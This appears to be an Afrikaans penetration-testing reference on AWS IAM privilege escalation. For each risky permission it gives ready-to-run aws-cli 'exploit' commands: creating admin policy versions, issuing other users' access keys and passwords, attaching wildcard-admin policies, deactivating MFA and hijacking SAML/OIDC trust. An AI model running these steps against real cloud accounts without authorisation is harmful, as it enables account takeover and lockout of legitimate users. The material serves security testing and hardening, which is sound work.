AWS - IAM Privesc

IAM

Vir meer inligting oor IAM kyk:

iam:CreatePolicyVersion

Gee die vermoë om 'n nuwe IAM-beleid weergawe te skep, wat die behoefte aan iam:SetDefaultPolicyVersion toestemming omseil deur die --set-as-default vlag te gebruik. Dit stel die definisie van pasgemaakte toestemmings in staat.

Exploit Command:

aws iam create-policy-version --policy-arn <target_policy_arn> \
--policy-document file:///path/to/administrator/policy.json --set-as-default

Impak: Verhoog direk die voorregte deur enige aksie op enige hulpbron toe te laat.

iam:SetDefaultPolicyVersion

Laat die verandering van die standaardweergawe van 'n IAM-beleid na 'n ander bestaande weergawe toe, wat moontlik voorregte kan verhoog as die nuwe weergawe meer toestemmings het.

Bash Opdrag:

aws iam set-default-policy-version --policy-arn <target_policy_arn> --version-id v2

Impak: Indirekte privilige-escalasie deur meer toestemmings in te skakel.

iam:CreateAccessKey

Stel die skep van toegangsleutel-ID en geheime toegangsleutel vir 'n ander gebruiker in, wat kan lei tot potensiële privilige-escalasie.

Eksploiteer:

aws iam create-access-key --user-name <target_user>

Impak: Direkte privilige-escalasie deur 'n ander gebruiker se uitgebreide toestemmings aan te neem.

iam:CreateLoginProfile | iam:UpdateLoginProfile

Stel die skep of opdatering van 'n aanmeldprofiel toe, insluitend die instelling van wagwoorde vir AWS-konsol aanmelding, wat lei tot direkte privilige-escalasie.

Eksploiteer vir Skepping:

aws iam create-login-profile --user-name target_user --no-password-reset-required \
--password '<password>'

Eksploiteer vir Opdatering:

aws iam update-login-profile --user-name target_user --no-password-reset-required \
--password '<password>'

Impak: Direkte privilige-escalasie deur in te log as "enige" gebruiker.

iam:UpdateAccessKey

Stel in staat om 'n gedeaktiveerde toegangssleutel te aktiveer, wat moontlik kan lei tot ongeoorloofde toegang as die aanvaller die gedeaktiveerde sleutel besit.

Eksploiteer:

aws iam update-access-key --access-key-id <ACCESS_KEY_ID> --status Active --user-name <username>

Impak: Direkte privilige-escalasie deur toegangssleutels te heraktiveer.

iam:CreateServiceSpecificCredential | iam:ResetServiceSpecificCredential

Stel in staat om kredensiale vir spesifieke AWS-dienste (bv. CodeCommit, Amazon Keyspaces) te genereer of te reset, wat die toestemmings van die geassosieerde gebruiker erf.

Eksploiteer vir Skepping:

aws iam create-service-specific-credential --user-name <username> --service-name <service>

Eksploiteer vir Herstel:

aws iam reset-service-specific-credential --service-specific-credential-id <credential_id>

Impak: Direkte privilige-escalasie binne die gebruiker se diens toestemmings.

iam:AttachUserPolicy || iam:AttachGroupPolicy

Stel in staat om beleide aan gebruikers of groepe te heg, wat direk privilige verhoog deur die toestemmings van die gehegte beleid te erf.

Eksploiteer vir Gebruiker:

aws iam attach-user-policy --user-name <username> --policy-arn "<policy_arn>"

Eksploiteer vir Groep:

aws iam attach-group-policy --group-name <group_name> --policy-arn "<policy_arn>"

Impak: Direkte privilige-escalasie na enigiets wat die beleid toelaat.

iam:AttachRolePolicy, ( sts:AssumeRole|iam:createrole) | iam:PutUserPolicy | iam:PutGroupPolicy | iam:PutRolePolicy

Stel die aanhegting of plasing van beleide aan rolle, gebruikers of groepe toe, wat direkte privilige-escalasie moontlik maak deur addisionele toestemmings toe te ken.

Eksploiteer vir Rol:

aws iam attach-role-policy --role-name <role_name> --policy-arn "<policy_arn>"

Eksploiteer vir Inline Beleide:

aws iam put-user-policy --user-name <username> --policy-name "<policy_name>" \
--policy-document "file:///path/to/policy.json"

aws iam put-group-policy --group-name <group_name> --policy-name "<policy_name>" \
--policy-document file:///path/to/policy.json

aws iam put-role-policy --role-name <role_name> --policy-name "<policy_name>" \
--policy-document file:///path/to/policy.json

U kan 'n beleid soos gebruik:

{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Action": [
"*"
],
"Resource": [
"*"
]
}
]
}

Impak: Direkte privilige-escalasie deur die toevoeging van toestemmings deur middel van beleide.

iam:AddUserToGroup

Stel jou in staat om jouself by 'n IAM-groep te voeg, wat privilige-escalasie moontlik maak deur die groep se toestemmings te erf.

Eksploiteer:

aws iam add-user-to-group --group-name <group_name> --user-name <username>

Impak: Direkte privilige-escalasie na die vlak van die groep se toestemmings.

iam:UpdateAssumeRolePolicy

Stel in staat om die aanneemrolbeleid dokument van 'n rol te verander, wat die aanneming van die rol en sy geassosieerde toestemmings moontlik maak.

Eksploiteer:

aws iam update-assume-role-policy --role-name <role_name> \
--policy-document file:///path/to/assume/role/policy.json

Waar die beleid soos volg lyk, wat die gebruiker toestemming gee om die rol aan te neem:

{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Action": "sts:AssumeRole",
"Principal": {
"AWS": "$USER_ARN"
}
}
]
}

Impak: Direkte privilige-escalasie deur enige rol se toestemmings aan te neem.

iam:UploadSSHPublicKey || iam:DeactivateMFADevice

Toelaat om 'n SSH publieke sleutel op te laai vir outentisering by CodeCommit en om MFA toestelle te deaktiveer, wat kan lei tot potensiële indirekte privilige-escalasie.

Eksploiteer vir SSH Sleutel Oplaai:

aws iam upload-ssh-public-key --user-name <username> --ssh-public-key-body <key_body>

Eksploiteer vir MFA-deaktivering:

aws iam deactivate-mfa-device --user-name <username> --serial-number <serial_number>

Impak: Indirekte privilige-escalasie deur CodeCommit-toegang te aktiveer of MFA-beskerming te deaktiveer.

iam:ResyncMFADevice

Stel die her-synchronisasie van 'n MFA-toestel toe, wat moontlik kan lei tot indirekte privilige-escalasie deur MFA-beskerming te manipuleer.

Bash Opdrag:

aws iam resync-mfa-device --user-name <username> --serial-number <serial_number> \
--authentication-code1 <code1> --authentication-code2 <code2>

Impak: Indirekte privilige-escalasie deur die toevoeging of manipulasie van MFA-toestelle.

iam:UpdateSAMLProvider, iam:ListSAMLProviders, (iam:GetSAMLProvider)

Met hierdie toestemmings kan jy die XML-metadata van die SAML-verbinding verander. Dan kan jy die SAML-federasie misbruik om in te log met enige rol wat dit vertrou.

Let daarop dat legitieme gebruikers nie in staat sal wees om in te log nie. Jy kan egter die XML kry, sodat jy joune kan plaas, inlog en die vorige weer konfigureer.

# List SAMLs
aws iam list-saml-providers

# Optional: Get SAML provider XML
aws iam get-saml-provider --saml-provider-arn <ARN>

# Update SAML provider
aws iam update-saml-provider --saml-metadata-document <value> --saml-provider-arn <arn>

## Login impersonating roles that trust the SAML provider

# Optional: Set the previous XML back
aws iam update-saml-provider --saml-metadata-document <previous-xml> --saml-provider-arn <arn>

iam:UpdateOpenIDConnectProviderThumbprint, iam:ListOpenIDConnectProviders, (iam:GetOpenIDConnectProvider)

(Onseker oor dit) As 'n aanvaller hierdie toestemmings het, kan hy 'n nuwe Thumbprint byvoeg om in te log in al die rolle wat die verskaffer vertrou.

# List providers
aws iam list-open-id-connect-providers
# Optional: Get Thumbprints used to not delete them
aws iam get-open-id-connect-provider --open-id-connect-provider-arn <ARN>
# Update Thumbprints (The thumbprint is always a 40-character string)
aws iam update-open-id-connect-provider-thumbprint --open-id-connect-provider-arn <ARN> --thumbprint-list 359755EXAMPLEabc3060bce3EXAMPLEec4542a3

Verwysings

• https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/